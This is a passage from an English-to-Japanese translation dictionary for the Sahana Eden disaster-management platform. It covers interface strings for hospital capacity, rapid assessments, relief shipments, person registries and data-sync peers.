'Normal food sources disrupted': '普段の食料供給源が混乱している',
'Normal': '通常どおり',
'Not Applicable': '該当なし',
'Not Authorised!': '認証されていません',
'Not Possible': '対応不可',
'Not Set': '設定されていません',
'Not Authorized': '認証されていません',
'Not installed or incorrectly configured.': 'インストールされていないか、適切な設定がされていません',
'Not yet a Member of any Group': 'メンバシップはまだ登録されていません',
'Note Details': '追加情報の詳細',
'Note Status': '状態を記録',
'Note Type': '追加情報の種類',
'Note added': '追加情報を追加しました',
'Note deleted': '追加情報を削除しました',
'Note that this list only shows active volunteers. To see all people registered in the system, do a search from the home screen instead': '注意:このリストは、活動中のボランティアのみ表示しています。システムに登録しているすべての人をみるには、ホーム・スクリーンから検索してください。',
'Note updated': '追加情報を更新しました',
'Note': '追加情報',
'Notes': '追加情報',
'Notice to Airmen': 'NOTAM (航空従事者用)',
'Number of Columns': '列数',
'Number of Patients': '患者数',
'Number of Rows': '行数',
'Number of Vehicles': '車両数',
'Number of additional beds of that type expected to become available in this unit within the next 24 hours.': 'この施設において、今後24時間以内に利用可能になると予測されている、このタイプの追加ベッド数。',
'Number of alternative places for studying': '授業用に確保できる場所の数',
'Number of available/vacant beds of that type in this unit at the time of reporting.': 'このタイプの利用可能/空きベッド数(報告時点)',
'Number of deaths during the past 24 hours.': '過去24時間以内の死亡者数',
'Number of discharged patients during the past 24 hours.': '退院患者数(過去24時間以内)',
'Number of doctors actively working': '現在活動中の医師の数',
'Number of doctors': '医者の人数',
'Number of houses damaged, but usable': '破損しているが利用可能な家屋の数',
'Number of houses destroyed/uninhabitable': '全壊/居住不可になった家屋数',
'Number of in-patients at the time of reporting.': 'レポート時の患者数です。',
'Number of latrines': 'トイレ総数',
'Number of midwives actively working': '現在活動中の助産師の数',
'Number of newly admitted patients during the past 24 hours.': '入院患者数(過去24時間以内)',
'Number of non-medical staff': '医療従事以外のスタッフ数',
'Number of nurses actively working': '現在活動中の看護師の数',
'Number of nurses': '看護師の人数',
'Number of private schools': '私立学校の数',
'Number of public schools': '公立学校の数',
'Number of religious schools': '宗教学校の数',
'Number of residential units not habitable': '住めなくなった住居の数',
'Number of residential units': '居住施設の数',
'Number of schools damaged but usable': '破損しているが利用可能な校舎の数',
'Number of schools destroyed/uninhabitable': '全壊 / 利用不可能な校舎の数',
'Number of schools open before disaster': '災害前に開校していた学校数',
'Number of schools open now': '現在開校している学校の数',
'Number of teachers affected by disaster': '被災した教師の数',
'Number of teachers before disaster': '災害発生前の教師の数',
'Number of vacant/available beds in this hospital. Automatically updated from daily reports.': '病院に設置されている、現在利用可能なベッドの数。日時レポートにより、自動的に更新されます。',
'Number of vacant/available units to which victims can be transported immediately.': '現在利用可能なユニット数。犠牲者を即座に安置できる数。',
'Number or Label on the identification tag this person is wearing (if any).': 'この人物の衣服につけられているタグの番号、あるいはラベル名(ある場合のみ).',
'Number or code used to mark the place of find, e.g. flag code, grid coordinates, site reference number or similar (if available)': 'この場所をあとで検索するための番号かコード 例: フラグ番号、グリッドの位置、サイトの参照番号など',
'Number': '番号',
'Number/Percentage of affected population that is Female & Aged 0-5': '女性(0-5歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 13-17': '女性(13-17歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 18-25': '女性(18-25歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 26-60': '女性(26-60歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 6-12': '女性(6-12歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 61+': '女性(61歳以上)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 0-5': '男性(0-5歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 13-17': '男性(13-17歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 18-25': '男性(18-25歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 26-60': '男性(26-60歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 6-12': '男性(6-12歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 61+': '男性(61歳以上)の被災者数 / 割合',
'Numbers Only': '数値のみ',
'Nursery Beds': '看護ベッド',
'Nutrition problems': '栄養問題',
'Nutrition': '食料・栄養',
'OR Reason': '手術室の詳細',
'OR Status Reason': '手術室の状態理由',
'OR Status': '手術室の状態',
'Observer': 'オブザーバ',
'Obsolete': '廃止済み',
'Obstetrics/Gynecology': '産婦人科',
'Office Address': 'オフィスの住所',
'Office Details': 'オフィスの詳細',
'Office added': 'オフィスを追加しました',
'Office deleted': 'オフィスを削除しました',
'Office updated': 'オフィスを更新しました',
'Office': 'オフィス',
'Offices': 'オフィス',
'Offline Sync (from USB/File Backup)': 'データのオフライン同期(USB/バックアップファイル利用)',
'Offline Sync': 'データのオフライン同期',
'Old': '古い',
'Older people as primary caregivers of children': '子供の介護を、高齢者が担当',
'Older people in care homes': '介護施設で生活する高齢者がいる',
'Older people participating in coping activities': '高齢者が災害対応に従事',
'Older people with chronical illnesses': '慢性疾患をもつ高齢者がいる',
'Older person (>60 yrs)': '高齢者(60歳以上)',
'On by default? (only applicable to Overlays)': 'デフォルトでオン(オーバーレイにのみ有効)',
'On by default?': 'デフォルトでON?',
'One Time Cost': '1回毎の費用',
'One time cost': '一回毎の費用',
'One-time costs': '一回毎の費用',
'One-time': '1回毎',
'Oops! Something went wrong...': '申し訳ありません、何か問題が発生しています。',
'Oops! something went wrong on our side.': '申し訳ありません、システム側に問題が発生しています。',
'Opacity (1 for opaque, 0 for fully-transparent)': '不透明度(1は不透明、0は完全に透明)',
'Open Assessment': '未解決のアセスメント',
'Open Map': '地図を開く',
'Open area': '空き地',
'Open recent': '最近使用したものを開く',
'Open': '開く',
'OpenStreetMap Editor': 'OpenStreetMap エディタ',
'Operating Rooms': '手術室',
'Optional link to an Incident which this Assessment was triggered by.': 'このアセスメントの端緒となった事故へのオプション・リンク',
'Optional': '任意',
'Optional. In GeoServer, this is the Workspace Namespace URI. Within the WFS getCapabilities, this is the FeatureType Name part before the colon(:).': 'オプション。GeoServerでは、ワークスペース名前空間のURIです。WFS getCapabilitiesでは、FeatureType名のコロンの前の部分です。',
'Options': 'オプション',
'Organization Details': '団体の詳細',
'Organization Registry': '団体情報の登録',
'Organization added': '団体を追加しました',
'Organization deleted': '団体を削除しました',
'Organization updated': '団体を更新しました',
'Organization': '団体',
'Organizations': '団体',
'Origin of the separated children': '離別した子供たちの出身地',
'Origin': '出身地',
'Other (describe)': 'その他 (要記述)',
'Other (specify)': 'その他(具体的に)',
'Other Evidence': 'その他の証跡',
'Other Faucet/Piped Water': 'その他 蛇口/パイプによる水源',
'Other Isolation': 'その他の孤立',
'Other Name': 'その他の名前',
'Other activities of boys 13-17yrs before disaster': 'その他、災害発生前の13-17歳男子の活動状況',
'Other activities of boys 13-17yrs': 'その他、13-17歳男子の活動状況',
'Other activities of boys <12yrs before disaster': 'その他、災害発生前の12歳以下男子の活動状況',
'Other activities of boys <12yrs': 'その他、12歳以下男子の活動状況',
'Other activities of girls 13-17yrs before disaster': 'その他、災害発生前の13-17歳女子の活動状況',
'Other activities of girls 13-17yrs': 'その他、13-17歳女子の活動状況',
'Other activities of girls<12yrs before disaster': 'その他、災害発生前の12歳以下女子の活動状況',
'Other activities of girls<12yrs': 'その他、12歳以下女子の活動状況',
'Other alternative infant nutrition in use': 'その他、使用されている乳児用代替食',
'Other alternative places for study': 'その他、授業開設に利用可能な施設',
'Other assistance needed': 'その他に必要な援助活動',
'Other assistance, Rank': 'その他の援助、ランク',
'Other current health problems, adults': 'その他の健康問題(成人)',
'Other current health problems, children': 'その他の健康問題(小児)',
'Other events': '他のイベント',
'Other factors affecting school attendance': 'その他、生徒の就学に影響する要因',
'Other major expenses': 'その他の主な支出',
'Other non-food items': '食料以外の救援物資',
'Other recommendations': '他の推薦',
'Other residential': '住宅その他',
'Other school assistance received': 'その他の学校用品を受領した',
'Other school assistance, details': '受領した学校用品の内訳',
'Other school assistance, source': 'その他の学校用品の送付元',
'Other side dishes in stock': '在庫のあるその他食材',
'Other types of water storage containers': 'それ以外の水貯蔵容器タイプ',
'Other ways to obtain food': 'それ以外の食料調達方法',
'Other': 'その他',
'Outbound Mail settings are configured in models/000_config.py.': '送信メール設定は、models/000_config.py で定義されています。',
'Outbox': '送信箱',
'Outgoing SMS Handler': 'SMS 送信ハンドラ',
'Outgoing SMS handler': 'SMS送信ハンドラ',
'Overall Hazards': 'すべての危険',
'Overhead falling hazard': '頭上落下物の危険',
'Overland Flow Flood': '陸上の洪水流量',
'Overlays': 'オーバーレイ',
'Owned Records': '自身のレコード',
'Owned Resources': '保持しているリソース',
'PDAM': '水道会社(PDAM)',
'PIN number ': 'PIN 番号',
'PIN': '暗証番号',
'PL Women': 'PL 女性',
'Pack': 'パック',
'Packs': 'パック',
'Pan Map: keep the left mouse button pressed and drag the map': 'マップをパン: マウスの左ボタンを押したまま、地図をドラッグしてください',
'Parameters': 'パラメータ',
'Parapets, ornamentation': '欄干、オーナメント',
'Parent Office': '親組織のオフィス',
'Parent needs to be of the correct level': '適切なレベルの親属性を指定してください',
'Parent needs to be set for locations of level': 'ロケーションのレベルには親属性が必要です',
'Parent needs to be set': '親情報が設定される必要があります',
'Parent': '親',
'Parents/Caregivers missing children': '親/介護者とはぐれた子供たち',
'Partial': '一部 / 不足',
'Participant': '参加者',
'Pashto': 'パシュトー語',
'Passport': 'パスポート',
'Password for authentication at the peer. Note that only HTTP Basic authentication is supported.': 'Password for authentication at the peer. HTTPベーシック認証のみサポートしています。',
'Password': 'パスワード',
'Path': 'パス',
'Pathology': '病理学',
'Patients': '患者数',
'Pediatric ICU': '小児ICU',
'Pediatric Psychiatric': '小児精神科',
'Pediatrics': '小児科医',
'Peer Details': 'データ同期先の詳細',
'Peer Registration Details': 'データ同期先登録の詳細',
'Peer Registration Request': 'データ同期先の登録要求',
'Peer Registration': 'データ同期先登録',
'Peer Type': '同期先タイプ',
'Peer UID': '同期先UID',
'Peer added': 'データ同期先を追加しました',
'Peer deleted': 'データ同期先を削除しました',
'Peer not allowed to push': '同期先がデータのプッシュを許可していません',
'Peer registration request added': 'データ同期先の登録要求を追加しました',
'Peer registration request deleted': 'データ同期先の登録要求を削除しました',
'Peer registration request updated': 'データ同期先の登録要求を更新しました',
'Peer updated': '同期先を更新しました',
'Peer': 'データ同期先',
'Peers': '同期先',
'Pending Requests': '保留中の支援要請',
'Pending': '中断',
'People Needing Food': '食料不足',
'People Needing Shelter': '避難所が必要',
'People Needing Water': '水が必要',
'People Trapped': '救難者',
'People with chronical illnesses': '慢性疾患をもつ成人がいる',
'People': '人物情報',
'Person 1': '人物 1',
'Person 1, Person 2 are the potentially duplicate records': '人物情報1と人物情報2は重複したレコードの可能性があります。',
'Person 2': '人物 2',
'Person Data': '人物データ',
'Person De-duplicator': '人物情報の重複削除',
'Person Details': '人物情報の詳細',
'Person Finder': '消息情報',
'Person Registry': '人物情報の登録',
'Person added to Group': 'グループメンバを追加しました',
'Person added to Team': 'グループメンバを追加しました',
'Person added': '人物情報を追加しました',
'Person deleted': '人物情報を削除しました',
'Person details updated': '人物情報を更新しました',
'Person interviewed': 'インタビュー担当者',
'Person missing': '行方不明中',
'Person must be specified!': '登録がありません',
'Person reporting': 'レポート報告者',
'Person who has actually seen the person/group.': '人物/グループで実際に目撃された人物情報',
'Person who is reporting about the presence.': 'この所在報告を行った人物です。',
'Person who observed the presence (if different from reporter).': '人物の所在を確認したひとの情報(報告者と異なる場合のみ記入)。',
'Person': '人物情報',
'Person/Group': '人物/グループ',
'Personal Data': '個人情報',
'Personal Effects Details': '個人の影響の詳細',
'Personal Effects': '所持品',
'Personal impact of disaster': 'この人物の被災状況',
'Personal': '個人',
'Persons in institutions': '施設居住中の住人',
'Persons with disability (mental)': '障がい者数(精神的障がい者を含む)',
'Persons with disability (physical)': '肉体的な障がい者の数',
'Persons': '人物情報',
'Phone 1': '電話番号',
'Phone 2': '電話番号(予備)',
'Phone': '電話番号',
'Phone/Business': '電話番号/仕事',
'Phone/Emergency': '電話番号/緊急連絡先',
'Phone/Exchange': '電話/とりつぎ',
'Photo Details': '写真の詳細',
'Photo Taken?': '写真撮影済み?',
'Photo added': '写真を追加しました',
'Photo deleted': '写真を削除しました',
'Photo updated': '写真を更新しました',
'Photo': '写真',
'Photograph': '写真',
'Photos': '写真',
'Physical Description': '身体外見の説明',
'Physical Safety': '身体的安全',
'Picture upload and finger print upload facility': '指紋や写真のアップロード機能',
'Picture': '写真',
'Place for solid waste disposal': '廃棄物の処理を行う場所を記載してください',
'Place of Recovery': '遺体回収場所',
'Place on Map': '地図上の場所',
'Places for defecation': 'トイレ',
'Places the children have been sent to': '子供たちの避難先',
'Planner': '立案者',
'Playing': '家庭内/外で遊ぶ',
'Please correct all errors.': 'すべてのエラーを修正してください。',
'Please enter a First Name': '苗字を入力してください',
'Please enter a valid email address': '有効な電子メールアドレスを入力してください。',
'Please enter the first few letters of the Person/Group for the autocomplete.': '自動入力するには人物あるいはグループの最初の数文字を入力してください',
'Please enter the recipient': '受取担当者を入力してください',
'Please fill this!': 'ここに入力してください',
'Please provide the URL of the page you are referring to, a description of what you expected to happen & what actually happened. If a ticket was issued then please provide the Ticket ID.': '言及先のURLを明示し、期待する結果と実際に発生した結果を記述してください。不具合チケットが発行された場合は、そのチケットIDも記載してください。',
'Please report here where you are:': 'いまあなたが居る場所を入力してください。',
'Please select another level': '別のレベルを選択してください',
'Please select': '選んでください',
'Please sign-up with your Cell Phone as this allows us to send you Text messages. Please include full Area code.': '携帯電話番号でサインアップし、Sahanaからのテキストメッセージを受け取れるようにします。国際電話コードまで含めた形式で入力してください',
'Please specify any problems and obstacles with the proper handling of the disease, in detail (in numbers, where appropriate). You may also add suggestions the situation could be improved.': '病気の治療に当たって問題となる事象の詳細を記載します。状況を改善するための提案も、もしあれば記載してください。',
'Please use this field to record any additional information, including a history of the record if it is updated.': '追加情報はこの項目に記載してください。レコードの変更履歴などにも利用可能です。',
'Please use this field to record any additional information, including any Special Needs.': '特別な要求など、どんな追加情報でも構いませんので、この部分に記録してください',
'Please use this field to record any additional information, such as Ushahidi instance IDs. Include a history of the record if it is updated.': 'UshahidiのインスタンスIDなど、追加情報がある場合はこの項目に記載してください。レコードの変更履歴などにも利用可能です。',
'Pledge Aid to match these Requests': 'これらの要求に一致する支援に寄付する',
'Pledge Aid': '寄付する',
'Pledge Status': '寄付のステータス',
'Pledge Support': '寄付サポート',
'Pledge': '寄付',
'Pledged': '寄付済み',
'Pledges': '寄付',
'Point': 'ポイント',
'Poisoning': '中毒',
'Poisonous Gas': '有毒ガス',
'Police': '警察',
'Pollution and other environmental': '汚染、あるいはその他の環境要因',
'Polygon reference of the rating unit': 'その評価単位への参照ポリゴン',
'Polygon': 'ポリゴン',
'Population and number of households': '人口と世帯数',
'Population': '利用者数',
'Porridge': 'おかゆ',
'Port Closure': '港湾閉鎖',
'Port': 'ポート',
'Position Details': 'ポジションの詳細',
'Position added': 'Position を追加しました',
'Position deleted': 'ポジションを削除しました',
'Position type': '場所のタイプ',
'Position updated': 'ポジションを更新しました',
'Positions': 'ポジション',
'Postcode': '郵便番号',
'Poultry restocking, Rank': '家禽の補充、ランク',
'Poultry': '家禽(ニワトリ)',
'Pounds': 'ポンド',
'Power Failure': '停電',
'Pre-cast connections': 'プレキャスト連結',
'Preferred Name': '呼び名',
'Pregnant women': '妊婦の数',
'Preliminary': '予備',
'Presence Condition': '所在情報',
'Presence Log': '所在履歴',
'Presence': '所在',
'Previous View': '前を表示',
'Previous': '前へ',
'Primary Name': '基本名',
'Primary Occupancy': '主要な従事者',
'Priority Level': '優先度レベル',
'Priority': '優先度',
'Private': '企業',
'Problem Administration': '問題管理',
'Problem Details': '問題の詳細',
'Problem Group': '問題グループ',
'Problem Title': '問題の名称',
'Problem added': '問題を追加しました',
'Problem connecting to twitter.com - please refresh': 'twitter.comに接続できません。更新ボタンを押してください',
'Problem deleted': '問題を削除しました',
'Problem updated': '問題を更新しました',
'Problem': '問題',
'Problems': '問題',
'Procedure': '手続き',
'Procurements': '物資の調達',
'Product Description': '製品の説明',
'Product Name': '製品名',
'Profile': 'プロファイル',
'Project Activities': 'プロジェクト活動状況',
'Project Details': 'プロジェクトの詳細',
'Project Management': 'プロジェクト管理',
'Project Status': 'プロジェクトのステータス',
'Project Tracking': 'プロジェクト追跡',
'Project added': 'プロジェクトを追加しました',
'Project deleted': 'プロジェクトを削除しました',
'Project has no Lat/Lon': 'プロジェクトの緯度/経度情報はありません',
'Project updated': 'プロジェクトを更新しました',
'Project': 'プロジェクト',
'Projection Details': '地図投影法の詳細',
'Projection added': '地図投影法を追加しました',
'Projection deleted': '地図投影法を削除しました',
'Projection updated': '地図投影法を更新しました',
'Projection': '地図投影法',
'Projections': '地図投影法',
'Projects': 'プロジェクト',
'Property reference in the council system': '評議システムで使用されるプロパティリファレンス',
'Protected resource': '保護されたリソース',
'Protection': '被災者保護',
'Provide Metadata for your media files': 'メディアファイルにメタデータを提供',
'Provide a password': 'パスワードを入力',
'Provide an optional sketch of the entire building or damage points. Indicate damage points.': '建物全体か損傷箇所のスケッチを提供し、損傷箇所を明示してください。',
'Province': '都道府県',
'Proxy-server': 'プロキシサーバ',
'Psychiatrics/Adult': '精神病/成人',
'Psychiatrics/Pediatric': '精神病/小児',
'Public Event': '公開イベント',
'Public and private transportation': '公共および民営の交通機関',
'Public assembly': '公会堂',
'Public': '公開',
'Pull tickets from external feed': '外部フィードからのticketの取得',
'Punjabi': 'パンジャブ',
'Push tickets to external system': '外部システムにチケットの発信',
'Put a choice in the box': '箱の中から選んで取る',
'Pyroclastic Flow': '火砕流',
'Pyroclastic Surge': '火砕サージ',
'Python Serial module not available within the running Python - this needs installing to activate the Modem': 'PythonでPython Serial moduleが利用できません。モデムの有効化に必要です。',
'Python needs the ReportLab module installed for PDF export': '実行中のPythonでReportLabモジュールが利用できません。PDF出力に必要です。',
'Quantity Committed': '引き受けた量',
'Quantity Fulfilled': '十分な量がある',
'Quantity in Transit': '運送中の数量',
'Quantity': '数量',
'Quarantine': '隔離施設',
'Queries': 'クエリ',
'Query Feature': '問合せ機能',
'Query': 'クエリ',
'Queryable?': '検索可能?',
'RC frame with masonry infill': '鉄骨入りコンクリートブロック',
'RECORD A': 'レコード A',
'RECORD B': 'レコード B',
'RESPONSE': '対応',
'Race': '人種',
'Radiological Hazard': '放射能災害',
'Radiology': '放射線科',
'Railway Accident': '鉄道事故',
'Railway Hijacking': '鉄道ハイジャック',
'Rain Fall': '降雨',
'Rapid Assessment Details': '被災地の現況アセスメントの詳細',
'Rapid Assessment added': '被災地の現況アセスメントを追加しました',
'Rapid Assessment deleted': '被災地の現況アセスメントを削除しました',
'Rapid Assessment updated': '被災地の現況アセスメントを更新しました',
'Rapid Assessment': '被災地の現況アセスメント',
'Rapid Assessments & Flexible Impact Assessments': '被災地の現況アセスメントと、災害影響範囲アセスメント',
'Rapid Assessments': '被災地の現況アセスメント',
'Rapid Close Lead': '急いで閉め、先導してください。',
'Rapid Data Entry': 'データ入力簡易版',
'Rating Scale': '評価尺度',
'Raw Database access': 'データベースへの直接アクセス',
'Read-Only': '読み込み専用',
'Read-only': '登録内容の編集を禁止',
'Real World Arbitrary Units': '実在の任意単位',
'Receive Items': '物資を受領',
'Receive Shipment': '輸送を受け取る',
'Receive this shipment?': 'この物資送付を受領しますか?',
'Receive': '物資受領',
'Received By': '物資受領責任者',
'Received Item Details': '配送済み物資の詳細',
'Received Item deleted': '受領した物資を削除しました',
'Received Item updated': '受領された物資を更新しました',
'Received Shipment Details': '受け取った輸送の詳細',
'Received Shipment canceled and items removed from Inventory': '受領した輸送をキャンセルしました。物資は備蓄から削除されます',
'Received Shipment canceled': '受け取った輸送をキャンセルしました',
'Received Shipment updated': '受領済みの配送物の情報が更新されました',
'Received Shipments': '受諾した輸送物資',
'Received': '受領済み',
'Receiving and Sending Items': '送付 / 受領した救援物資',
'Recipient': '受け取り担当者',
'Recipients': '受信者',
'Recommendations for Repair and Reconstruction or Demolition': '再築や取り壊し、修繕を推奨',
'Record %(id)s created': 'レコード %(id)s が作成されました',
'Record Created': '作成されたレコード',
'Record Details': 'レコードの詳細',
'Record ID': 'レコードID',
'Record Saved': 'レコードが保存されました',
'Record added': 'レコードを追加しました',
'Record any restriction on use or entry': '利用や入力に当たっての制限事項を記載',
'Record deleted': 'レコードを削除しました',
'Record last updated': '最近更新されたレコード',
'Record not found!': 'レコードが見つかりませんでした',
'Record updated': 'レコードを更新しました',
'Record': 'レコード',
'Recording and Assigning Assets': '物資の割り当てと記録',
'Records': 'レコード',
'Recovery Request added': '遺体の回収要請を追加しました',
'Recovery Request deleted': '遺体回収要請を削除しました',
'Recovery Request updated': '遺体回収要請を更新しました',
'Recovery Request': '遺体回収の要請',
'Recovery Requests': '遺体回収要請',
'Recovery report added': '遺体回収レポートを追加しました',
'Recovery report deleted': '遺体回収レポートを削除しました',
'Recovery report updated': '遺体回収レポートを更新しました',
'Recovery': '遺体回収',
'Recruitment': '人材募集',
'Recurring Cost': '経常費用',
'Recurring cost': '経常費用',
'Recurring costs': '経常費用',
'Recurring': '採用活動',
'Red': '赤',
'Reference Document': '関連文書',
'Region Location': '地域のロケーション',
'Regional': '国際支部',
'Register Person into this Shelter': 'この避難所に人物情報を登録',
'Register Person': '人物情報を登録',
'Register them as a volunteer': 'ボランティアとして登録',
'Register': '登録',
'Registered People': '登録した人物情報',
'Registered users can': '登録済みのユーザは',
'Registering ad-hoc volunteers willing to contribute': '貢献を希望する臨時ボランティアを登録',
'Registration Details': '登録情報詳細',
'Registration Disabled!': '現在アカウント登録は受け付けていません。',
'Registration added': '登録を追加しました',
'Registration entry deleted': '登録を削除しました',
'Registration is still pending approval from Approver (%s) - please wait until confirmation received.': '登録はまだ承認されていません (承認者:(%s)) -- 確認メールが届くまでもうしばらくお待ちください。',
'Registration key': '登録key',
'Registration successful': '登録に成功しました',
'Registration updated': '登録を更新しました',
'Registration': '登録',
'Registry keeps track of all the relief organizations working in the disaster region. It captures not only the places where they are active, but also captures information on the range of projects they are providing in each area.': '地域内で活動する全ての支援団体を追跡し、情報を保持します。これにより、各団体が活動している地域の情報だけでなく、それぞれの地域でどのような活動が行われているかも掌握することができます。',
'Rehabilitation/Long Term Care': 'リハビリ/長期介護',
'Reinforced masonry': 'コンクリートブロック壁',
'Rejected': '拒否されました',
'Reliable access to sanitation/hygiene items': 'サニタリ / 衛生用品の安定供給がある',
'Relief Item Catalog': '救援物資カタログ',
'Relief Item': '救援物資',
'Relief Items': '救援物資',
'Relief Team': '救援チーム',
'Relief': '救援',
'Religion': '宗教',
'Religious Leader': '宗教指導者',
'Religious': '宗教',
'Relocate as instructed in the <instruction>': '<instruction>の内容に従って再配置',
'Remove Feature: Select the feature you wish to remove & press the delete key': 'Featureの削除: 削除したいfeatureを選択し、削除キーを押下してください',
'Remove Person from Group': 'メンバシップを削除',
'Remove Person from Team': 'メンバシップを削除',
'Remove': '削除',
'Removed from Group': 'メンバシップを削除しました',
'Removed from Team': 'メンバシップを削除しました',
'Repeat your password': 'パスワードをもう一度入力してください',
'Replace if Master': 'マスターなら置換',
'Replace if Newer': '新しいものがあれば置き換える',
'Replace': '置換',
'Report Another Assessment...': '別のアセスメントをレポートする',
'Report Details': 'レポートの詳細',
'Report Resource': 'レポートリソース',
'Report Type': 'レポートタイプ',
'Report Types Include': 'レポートタイプを含む',
'Report a Problem with the Software': 'ソフトウェアの不具合を報告',
'Report added': 'レポートを追加しました',
'Report deleted': 'レポートを削除しました',
'Report my location': '自分の現在地を報告',
'Report that person missing': '行方不明者の情報を報告',
'Report the contributing factors for the current EMS status.': '現在の緊急受け入れ状態に影響している事由を記載',
'Report the contributing factors for the current OR status.': '現在の手術室の状況報告',
'Report the person as found': '人物の所在情報を報告',
'Report them as found': '発見として報告',
'Report them missing': '行方不明として報告',
'Report updated': 'レポートを更新しました',
'Report': 'レポート',
'Reporter Name': 'レポーターの氏名',
'Reporter': 'レポーター',
'Reporting on the projects in the region': 'この地域で展開しているプロジェクトのレポート',
'Reports': 'レポート',
'Request Added': '支援要請を追加しました',
'Request Canceled': '支援要請をキャンセルしました',
'Request Details': '支援要請の詳細',
'Request Item Details': '救援物資要請の詳細',
'Request Item added': '救援物資の要請を追加しました',
'Request Item deleted': '救援物資の要請を削除しました',
'Request Item updated': '救援物資の要請を更新しました',
'Request Item': '物資を要請',
'Request Items': '物資の要請',
'Request Status': '支援要請の状況',
'Request Type': '支援要請のタイプ',
'Request Updated': '支援要請を更新しました',
'Request added': '支援要請を追加しました',
'Request deleted': '支援要請を削除しました',
'Request for Role Upgrade': '上位権限の取得要求',
'Request updated': '支援要請を更新しました',
'Request': '支援要請',
'Request, Response & Session': '要求、応答、およびセッション',
'Requested By Site': '支援要請を行ったサイト',
'Requested By Warehouse': '倉庫からの要請',
'Requested By': '支援要求元',
'Requested Items': '支援要請が行われた物資',
'Requested by': '要求元',
'Requested on': 'に関する要請',
'Requested': '要求済み',
'Requester': '要請の実施者',
'Requestor': '要請者',
'Requests From': '支援要請フォーム',
'Requests for Item': '物資に関する要請',
'Requests': '支援要請',
'Requires Login!': 'ログインしてください。',
'Requires login': 'ログインが必要です',
'Rescue and recovery': '救出、あるいは遺体回収作業',
'Reset Password': 'パスワードのリセット',
'Reset form': 'フォームをクリア',
'Reset': 'リセット',
'Resize Feature: Select the feature you wish to resize & then Drag the associated dot to your desired size': 'Featureのリサイズ: リサイズしたいfeatureを選択し、適切なサイズになるようドラッグしてください',
'Resolve Conflict': '競合の解決',
'Resolve link brings up a new screen which helps to resolve these duplicate records and update the database.': '"解決"リンクでは、新しい画面を開き、重複している情報を解決してデータベースを更新します',
'Resolve': '解決済みか',
'Resource Details': 'リソースの詳細',
'Resource added': 'リソースを追加しました',
'Resource deleted': 'リソースを削除しました',
'Resource updated': 'リソースを更新しました',
'Resource': 'リソース',
'Resources': 'リソース',
'Respiratory Infections': '呼吸器感染症',
'Response Details': '応答の詳細',
'Response added': '返答を追加しました',
'Response deleted': 'Responseを削除しました',
'Response updated': '返答を更新しました',
'Response': '対応',
'Responses': '対応',
'Restricted Access': 'アクセス制限中',
'Restricted Use': '制限された目的での使用',
'Restrictions': '制限',
'Results': '結果',
'Retail Crime': '小売犯罪',
'Retrieve Password': 'パスワードの取得',
'Rice': '米穀',
'Riot': '暴動',
'River Details': '河川の詳細',
'River added': '河川を追加しました',
'River deleted': '河川を削除しました',
'River updated': '河川を更新しました',
'River': '河川',
'Rivers': '河川',
'Road Accident': '道路障害',
'Road Closed': '道路(通行止め)',
'Road Conditions': '路面の状況',
'Road Delay': '道路遅延',
'Road Hijacking': '道路ハイジャック',
'Road Usage Condition': '道路の路面状況',
'Role Details': '権限の詳細',
'Role Name': '権限の名称',
'Role Required': '権限が必要',
'Role Updated': '権限を更新しました',
'Role added': '権限を追加しました',
'Role deleted': '権限を削除しました',
'Role updated': '権限を更新しました',
'Role': '権限',
'Role-based': '権限に基づいた',
'Roles Permitted': '許可された権限',
'Roles': '権限',
'Roof tile': '屋根瓦',
'Roofs, floors (vertical load)': '屋根、床板 (vertical load)',
'Roster': '名簿',
'Rotate Feature: Select the feature you wish to rotate & then Drag the associated dot to rotate to your desired location': '地物の回転: 回転させたい地物を選択し、目的の位置に回転させるために関連付けられた点をドラッグします。',
'Row Choices (One Per Line)': '行の選択 (One Per Line)',
'Rows in table': 'テーブルの行',
'Rows selected': '行が選択されました',
'Run Functional Tests': '動作テストの実行',
'Run Interval': '実行間隔',
'Running Cost': 'ランニングコスト',
'SITUATION': '状況',
'Safe environment for vulnerable groups': '被災者にとって安全な環境である',
'Safety Assessment Form': '安全性アセスメントフォーム',
'Safety of children and women affected by disaster': '被災した女性と未成年が保護されている',
'Sahana Administrator': 'Sahana管理者',
'Sahana Blue': 'Sahana ブルー',
'Sahana Community Chat': 'Sahanaコミュニティチャット',
'Sahana Eden <=> Other (Sahana Agasti, Ushahidi, etc.)': 'Sahana Eden <=> その他 (Sahana Agasti, Ushahidi 等.)',
'Sahana Eden <=> Other': 'Sahana Eden <=> 他のシステム',
'Sahana Eden Disaster Management Platform': 'Sahana Eden 被災地支援情報共有プラットフォーム',
'Sahana Eden Website': 'Sahana Eden公式ページ',
'Sahana Eden is a family of applications that provide solutions to coordination and collaboration for organizations working in disaster management.': 'Sahana Edenは、災害復旧に関わる様々な支援団体が、お互いに協力しあうために存在します。',
'Sahana FOSS Disaster Management System': 'Sahana オープンソース 被災地情報共有システム',
'Sahana Green': 'Sahana グリーン',
'Sahana Login Approval Pending': 'Sahana ログインは承認待ちです',
'Sahana access granted': 'Sahanaへのアクセス権を付与',
'Sahana: new request has been made. Please login to see if you can fulfil the request.': 'Sahana: 新しい支援要請が行われました。ログインして、支援要請を実現できるか確認してください。',
'Salted Fish': '塩漬けの魚',
'Salvage material usable from destroyed houses': '全壊した家屋から回収した物品(使用可能)',
'Salvage material usable from destroyed schools': '全壊した校舎から回収した物品(使用可能)',
'Sanitation problems': '衛生設備に問題',
'Satellite Office': '現地活動拠点',
'Satellite': '衛星',
'Saturday': '土曜日',
'Save any Changes in the one you wish to keep': '残す方の候補地へ行った変更を保存します。',
'Save': '保存',
'Save: Default Lat, Lon & Zoom for the Viewport': 'デフォルト表示範囲の緯度,経度,ズームレベルを保存',
'Saved.': '保存しました',
'Saving...': '保存しています...',
'Scale of Results': '結果の規模',
'Schedule': 'スケジュール',
'School Closure': '学校閉鎖',
'School Lockdown': '学校の厳重封鎖',
'School Reports': '学校のレポート',
'School Teacher': '学校教師',
'School activities': '学校の活動',
